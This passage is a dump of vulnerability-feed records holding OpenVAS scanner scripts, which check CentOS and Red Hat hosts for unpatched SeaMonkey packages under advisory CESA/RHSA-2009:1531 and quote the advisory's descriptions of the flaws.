{\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libnspr4-dev\", ver:\"4.7.1-5\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:39:58", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1563", "CVE-2009-3376", "CVE-2009-3274", "CVE-2009-3380", "CVE-2009-3375", "CVE-2009-0689"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2011-08-09T00:00:00", "id": "OPENVAS:1361412562310880851", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310880851", "type": "openvas", "title": "CentOS Update for seamonkey CESA-2009:1531 centos3 i386", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for seamonkey CESA-2009:1531 centos3 i386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2009-October/016202.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.880851\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2011-08-09 08:20:34 +0200 (Tue, 09 Aug 2011)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"CESA\", value:\"2009:1531\");\n script_cve_id(\"CVE-2009-3380\", \"CVE-2009-3375\", \"CVE-2009-3274\", \"CVE-2009-0689\", \"CVE-2009-3376\");\n script_name(\"CentOS Update for seamonkey CESA-2009:1531 centos3 i386\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'seamonkey'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS3\");\n script_tag(name:\"affected\", value:\"seamonkey on CentOS 3\");\n script_tag(name:\"insight\", value:\"SeaMonkey is an open source Web browser, email and newsgroup client, IRC\n chat client, and HTML editor.\n\n A flaw was found in the way SeaMonkey creates temporary file names for\n downloaded files. If a local attacker knows the name of a file SeaMonkey is\n going to download, they can replace the contents of that file with\n arbitrary contents. (CVE-2009-3274)\n\n A heap-based buffer overflow flaw was found in the SeaMonkey string to\n floating point conversion routines. A web page containing malicious\n JavaScript could crash SeaMonkey or, potentially, execute arbitrary code\n with the privileges of the user running SeaMonkey. (CVE-2009-1563)\n\n A flaw was found in the way SeaMonkey handles text selection. A malicious\n website may be able to read highlighted text in a different domain (e.g.\n another website the user is viewing), bypassing the same-origin policy.\n (CVE-2009-3375)\n\n A flaw was found in the way SeaMonkey displays a right-to-left override\n character when downloading a file. In these cases, the name displayed in\n the title bar differs from the name displayed in the dialog body. An\n attacker could use this flaw to trick a user into downloading a file that\n has a file name or extension that differs from what the user expected.\n (CVE-2009-3376)\n\n Several flaws were found in the processing of malformed web content. A web\n page containing malicious content could cause SeaMonkey to crash or,\n potentially, execute arbitrary code with the privileges of the user running\n SeaMonkey. (CVE-2009-3380)\n\n All SeaMonkey users should upgrade to these updated packages, which correct\n these issues. After installing the update, SeaMonkey must be restarted for\n the changes to take effect.\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS3\")\n{\n\n if ((res = isrpmvuln(pkg:\"seamonkey\", rpm:\"seamonkey~1.0.9~0.47.el3.centos3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-chat\", rpm:\"seamonkey-chat~1.0.9~0.47.el3.centos3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-devel\", rpm:\"seamonkey-devel~1.0.9~0.47.el3.centos3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-dom-inspector\", rpm:\"seamonkey-dom-inspector~1.0.9~0.47.el3.centos3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-js-debugger\", rpm:\"seamonkey-js-debugger~1.0.9~0.47.el3.centos3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-mail\", rpm:\"seamonkey-mail~1.0.9~0.47.el3.centos3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-nspr\", rpm:\"seamonkey-nspr~1.0.9~0.47.el3.centos3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-nspr-devel\", rpm:\"seamonkey-nspr-devel~1.0.9~0.47.el3.centos3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-nss\", rpm:\"seamonkey-nss~1.0.9~0.47.el3.centos3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-nss-devel\", rpm:\"seamonkey-nss-devel~1.0.9~0.47.el3.centos3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:39:50", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1563", "CVE-2009-3376", "CVE-2009-3274", "CVE-2009-3380", "CVE-2009-3375", "CVE-2009-0689"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2011-08-09T00:00:00", "id": "OPENVAS:1361412562310880670", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310880670", "type": "openvas", "title": "CentOS Update for seamonkey CESA-2009:1531 centos4 i386", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for seamonkey CESA-2009:1531 centos4 i386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2009-October/016204.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.880670\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2011-08-09 08:20:34 +0200 (Tue, 09 Aug 2011)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"CESA\", value:\"2009:1531\");\n script_cve_id(\"CVE-2009-3380\", \"CVE-2009-3375\", \"CVE-2009-3274\", \"CVE-2009-0689\", \"CVE-2009-3376\");\n script_name(\"CentOS Update for seamonkey CESA-2009:1531 centos4 i386\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'seamonkey'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS4\");\n script_tag(name:\"affected\", value:\"seamonkey on CentOS 4\");\n script_tag(name:\"insight\", value:\"SeaMonkey is an open source Web browser, email and newsgroup client, IRC\n chat client, and HTML editor.\n\n A flaw was found in the way SeaMonkey creates temporary file names for\n downloaded files. If a local attacker knows the name of a file SeaMonkey is\n going to download, they can replace the contents of that file with\n arbitrary contents. (CVE-2009-3274)\n\n A heap-based buffer overflow flaw was found in the SeaMonkey string to\n floating point conversion routines. A web page containing malicious\n JavaScript could crash SeaMonkey or, potentially, execute arbitrary code\n with the privileges of the user running SeaMonkey. (CVE-2009-1563)\n\n A flaw was found in the way SeaMonkey handles text selection. A malicious\n website may be able to read highlighted text in a different domain (e.g.\n another website the user is viewing), bypassing the same-origin policy.\n (CVE-2009-3375)\n\n A flaw was found in the way SeaMonkey displays a right-to-left override\n character when downloading a file. In these cases, the name displayed in\n the title bar differs from the name displayed in the dialog body. An\n attacker could use this flaw to trick a user into downloading a file that\n has a file name or extension that differs from what the user expected.\n (CVE-2009-3376)\n\n Several flaws were found in the processing of malformed web content. A web\n page containing malicious content could cause SeaMonkey to crash or,\n potentially, execute arbitrary code with the privileges of the user running\n SeaMonkey. (CVE-2009-3380)\n\n All SeaMonkey users should upgrade to these updated packages, which correct\n these issues. After installing the update, SeaMonkey must be restarted for\n the changes to take effect.\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS4\")\n{\n\n if ((res = isrpmvuln(pkg:\"seamonkey\", rpm:\"seamonkey~1.0.9~50.el4.centos\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-chat\", rpm:\"seamonkey-chat~1.0.9~50.el4.centos\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-devel\", rpm:\"seamonkey-devel~1.0.9~50.el4.centos\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-dom-inspector\", rpm:\"seamonkey-dom-inspector~1.0.9~50.el4.centos\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-js-debugger\", rpm:\"seamonkey-js-debugger~1.0.9~50.el4.centos\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-mail\", rpm:\"seamonkey-mail~1.0.9~50.el4.centos\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-25T10:55:38", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1563", "CVE-2009-3376", "CVE-2009-3274", "CVE-2009-3380", "CVE-2009-3375", "CVE-2009-0689"], "description": "Check for the Version of seamonkey", "modified": "2017-07-10T00:00:00", "published": "2011-08-09T00:00:00", "id": "OPENVAS:880670", "href": "http://plugins.openvas.org/nasl.php?oid=880670", "type": "openvas", "title": "CentOS Update for seamonkey CESA-2009:1531 centos4 i386", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for seamonkey CESA-2009:1531 centos4 i386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"SeaMonkey is an open source Web browser, email and newsgroup client, IRC\n chat client, and HTML editor.\n\n A flaw was found in the way SeaMonkey creates temporary file names for\n downloaded files. If a local attacker knows the name of a file SeaMonkey is\n going to download, they can replace the contents of that file with\n arbitrary contents. (CVE-2009-3274)\n \n A heap-based buffer overflow flaw was found in the SeaMonkey string to\n floating point conversion routines. A web page containing malicious\n JavaScript could crash SeaMonkey or, potentially, execute arbitrary code\n with the privileges of the user running SeaMonkey. (CVE-2009-1563)\n \n A flaw was found in the way SeaMonkey handles text selection. A malicious\n website may be able to read highlighted text in a different domain (e.g.\n another website the user is viewing), bypassing the same-origin policy.\n (CVE-2009-3375)\n \n A flaw was found in the way SeaMonkey displays a right-to-left override\n character when downloading a file. In these cases, the name displayed in\n the title bar differs from the name displayed in the dialog body. An\n attacker could use this flaw to trick a user into downloading a file that\n has a file name or extension that differs from what the user expected.\n (CVE-2009-3376)\n \n Several flaws were found in the processing of malformed web content. A web\n page containing malicious content could cause SeaMonkey to crash or,\n potentially, execute arbitrary code with the privileges of the user running\n SeaMonkey. (CVE-2009-3380)\n \n All SeaMonkey users should upgrade to these updated packages, which correct\n these issues. After installing the update, SeaMonkey must be restarted for\n the changes to take effect.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_affected = \"seamonkey on CentOS 4\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2009-October/016204.html\");\n script_id(880670);\n script_version(\"$Revision: 6653 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 13:46:53 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-08-09 08:20:34 +0200 (Tue, 09 Aug 2011)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"CESA\", value: \"2009:1531\");\n script_cve_id(\"CVE-2009-3380\", \"CVE-2009-3375\", \"CVE-2009-3274\", \"CVE-2009-0689\", \"CVE-2009-3376\");\n script_name(\"CentOS Update for seamonkey CESA-2009:1531 centos4 i386\");\n\n script_summary(\"Check for the Version of seamonkey\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS4\")\n{\n\n if ((res = isrpmvuln(pkg:\"seamonkey\", rpm:\"seamonkey~1.0.9~50.el4.centos\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-chat\", rpm:\"seamonkey-chat~1.0.9~50.el4.centos\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-devel\", rpm:\"seamonkey-devel~1.0.9~50.el4.centos\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-dom-inspector\", rpm:\"seamonkey-dom-inspector~1.0.9~50.el4.centos\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-js-debugger\", rpm:\"seamonkey-js-debugger~1.0.9~50.el4.centos\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-mail\", rpm:\"seamonkey-mail~1.0.9~50.el4.centos\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-25T10:55:36", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1563", "CVE-2009-3376", "CVE-2009-3274", "CVE-2009-3380", "CVE-2009-3375", "CVE-2009-0689"], "description": "Check for the Version of seamonkey", "modified": "2017-07-10T00:00:00", "published": "2011-08-09T00:00:00", "id": "OPENVAS:880851", "href": "http://plugins.openvas.org/nasl.php?oid=880851", "type": "openvas", "title": "CentOS Update for seamonkey CESA-2009:1531 centos3 i386", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for seamonkey CESA-2009:1531 centos3 i386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"SeaMonkey is an open source Web browser, email and newsgroup client, IRC\n chat client, and HTML editor.\n\n A flaw was found in the way SeaMonkey creates temporary file names for\n downloaded files. If a local attacker knows the name of a file SeaMonkey is\n going to download, they can replace the contents of that file with\n arbitrary contents. (CVE-2009-3274)\n \n A heap-based buffer overflow flaw was found in the SeaMonkey string to\n floating point conversion routines. A web page containing malicious\n JavaScript could crash SeaMonkey or, potentially, execute arbitrary code\n with the privileges of the user running SeaMonkey. (CVE-2009-1563)\n \n A flaw was found in the way SeaMonkey handles text selection. A malicious\n website may be able to read highlighted text in a different domain (e.g.\n another website the user is viewing), bypassing the same-origin policy.\n (CVE-2009-3375)\n \n A flaw was found in the way SeaMonkey displays a right-to-left override\n character when downloading a file. In these cases, the name displayed in\n the title bar differs from the name displayed in the dialog body. An\n attacker could use this flaw to trick a user into downloading a file that\n has a file name or extension that differs from what the user expected.\n (CVE-2009-3376)\n \n Several flaws were found in the processing of malformed web content. A web\n page containing malicious content could cause SeaMonkey to crash or,\n potentially, execute arbitrary code with the privileges of the user running\n SeaMonkey. (CVE-2009-3380)\n \n All SeaMonkey users should upgrade to these updated packages, which correct\n these issues. After installing the update, SeaMonkey must be restarted for\n the changes to take effect.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_affected = \"seamonkey on CentOS 3\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2009-October/016202.html\");\n script_id(880851);\n script_version(\"$Revision: 6653 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 13:46:53 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-08-09 08:20:34 +0200 (Tue, 09 Aug 2011)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"CESA\", value: \"2009:1531\");\n script_cve_id(\"CVE-2009-3380\", \"CVE-2009-3375\", \"CVE-2009-3274\", \"CVE-2009-0689\", \"CVE-2009-3376\");\n script_name(\"CentOS Update for seamonkey CESA-2009:1531 centos3 i386\");\n\n script_summary(\"Check for the Version of seamonkey\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS3\")\n{\n\n if ((res = isrpmvuln(pkg:\"seamonkey\", rpm:\"seamonkey~1.0.9~0.47.el3.centos3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-chat\", rpm:\"seamonkey-chat~1.0.9~0.47.el3.centos3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-devel\", rpm:\"seamonkey-devel~1.0.9~0.47.el3.centos3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-dom-inspector\", rpm:\"seamonkey-dom-inspector~1.0.9~0.47.el3.centos3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-js-debugger\", rpm:\"seamonkey-js-debugger~1.0.9~0.47.el3.centos3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-mail\", rpm:\"seamonkey-mail~1.0.9~0.47.el3.centos3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-nspr\", rpm:\"seamonkey-nspr~1.0.9~0.47.el3.centos3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-nspr-devel\", rpm:\"seamonkey-nspr-devel~1.0.9~0.47.el3.centos3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-nss\", rpm:\"seamonkey-nss~1.0.9~0.47.el3.centos3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-nss-devel\", rpm:\"seamonkey-nss-devel~1.0.9~0.47.el3.centos3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-27T10:56:02", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1563", "CVE-2009-3376", "CVE-2009-3274", "CVE-2009-3380", "CVE-2009-3375", "CVE-2009-0689"], "description": "The remote host is missing updates announced in\nadvisory RHSA-2009:1531.\n\nSeaMonkey is an open source Web browser, email and newsgroup client, IRC\nchat client, and HTML editor.\n\nA flaw was found in the way SeaMonkey creates temporary file names for\ndownloaded files. If a local attacker knows the name of a file SeaMonkey is\ngoing to download, they can replace the contents of that file with\narbitrary contents. (CVE-2009-3274)\n\nA heap-based buffer overflow flaw was found in the SeaMonkey string to\nfloating point conversion routines. A web page containing malicious\nJavaScript could crash SeaMonkey or, potentially, execute arbitrary code\nwith the privileges of the user running SeaMonkey. (CVE-2009-1563)\n\nA flaw was found in the way SeaMonkey handles text selection. A malicious\nwebsite may be able to read highlighted text in a different domain (e.g.\nanother website the user is viewing), bypassing the same-origin policy.\n(CVE-2009-3375)\n\nA flaw was found in the way SeaMonkey displays a right-to-left override\ncharacter when downloading a file. In these cases, the name displayed in\nthe title bar differs from the name displayed in the dialog body. An\nattacker could use this flaw to trick a user into downloading a file that\nhas a file name or extension that differs from what the user expected.\n(CVE-2009-3376)\n\nSeveral flaws were found in the processing of malformed web content. A web\npage containing malicious content could cause SeaMonkey to crash or,\npotentially, execute arbitrary code with the privileges of the user running\nSeaMonkey. (CVE-2009-3380)\n\nAll SeaMonkey users should upgrade to these updated packages, which correct\nthese issues. After installing the update, SeaMonkey must be restarted for\nthe changes to take effect.", "modified": "2017-07-12T00:00:00", "published": "2009-11-11T00:00:00", "id": "OPENVAS:66121", "href": "http://plugins.openvas.org/nasl.php?oid=66121", "type": "openvas", "title": "RedHat Security Advisory RHSA-2009:1531", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: RHSA_2009_1531.nasl 6683 2017-07-12 09:41:57Z cfischer $\n# Description: Auto-generated from advisory RHSA-2009:1531 ()\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates announced in\nadvisory RHSA-2009:1531.\n\nSeaMonkey is an open source Web browser, email and newsgroup client, IRC\nchat client, and HTML editor.\n\nA flaw was found in the way SeaMonkey creates temporary file names for\ndownloaded files. If a local attacker knows the name of a file SeaMonkey is\ngoing to download, they can replace the contents of that file with\narbitrary contents. (CVE-2009-3274)\n\nA heap-based buffer overflow flaw was found in the SeaMonkey string to\nfloating point conversion routines. A web page containing malicious\nJavaScript could crash SeaMonkey or, potentially, execute arbitrary code\nwith the privileges of the user running SeaMonkey. (CVE-2009-1563)\n\nA flaw was found in the way SeaMonkey handles text selection. A malicious\nwebsite may be able to read highlighted text in a different domain (e.g.\nanother website the user is viewing), bypassing the same-origin policy.\n(CVE-2009-3375)\n\nA flaw was found in the way SeaMonkey displays a right-to-left override\ncharacter when downloading a file. In these cases, the name displayed in\nthe title bar differs from the name displayed in the dialog body. An\nattacker could use this flaw to trick a user into downloading a file that\nhas a file name or extension that differs from what the user expected.\n(CVE-2009-3376)\n\nSeveral flaws were found in the processing of malformed web content. A web\npage containing malicious content could cause SeaMonkey to crash or,\npotentially, execute arbitrary code with the privileges of the user running\nSeaMonkey. (CVE-2009-3380)\n\nAll SeaMonkey users should upgrade to these updated packages, which correct\nthese issues. After installing the update, SeaMonkey must be restarted for\nthe changes to take effect.\";\n\ntag_solution = \"Please note that this update is available via\nRed Hat Network. To use Red Hat Network, launch the Red\nHat Update Agent with the following command: up2date\";\n\n\n\nif(description)\n{\n script_id(66121);\n script_version(\"$Revision: 6683 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-12 11:41:57 +0200 (Wed, 12 